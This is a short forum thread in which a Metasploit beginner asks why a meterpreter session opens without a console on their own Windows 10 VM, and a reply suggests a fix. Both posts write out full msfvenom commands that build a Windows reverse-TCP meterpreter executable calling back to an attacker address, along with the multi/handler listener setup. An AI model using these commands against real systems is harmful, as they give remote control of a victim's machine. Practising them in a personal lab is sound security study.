Meterpreter console not opening

aideux

For some reason, I keep getting an issue where, when the victim double-clicks on the payload, a session is opened, but not the console that would allow me to use meterpreter. To create the payload, I use this code:

msfvenom -p windows/meterpreter_reverse_tcp --platform windows -a x86 -f exe LHOST=[attacker IP address] LPORT=5555 -o /root/Desktop/[filename].exe

Then, in the metasploit console, I type:

use multi/handler

set payload windows/meterpreter_reverse_tcp

set LHOST [attacker IP address]

set LPORT 5555

exploit

Then, a session is opened, but the line that looks like "meterpreter>" does not open.

I have tried using different ports, and have also attempted to use ngrok, which did not work. The system I am attacking is my own windows 10 VM. Can someone please help me out? I am new to using metasploit, and would love some advice.

Try using this code instead. You will have to create a new payload above to match.

msfvenom --platform Windows -p windows/meterpreter/reverse_tcp LHOST=(Attack IP) LPORT=(ATTACK PORT) -f exe -o "/root/Desktop/(filename).exe"

use exploit/multi/handler/

set payload windows/meterpreter/reverse_tcp

set LHOST (your ip address)

set LPORT (the same port you've set in the payload code)

exploit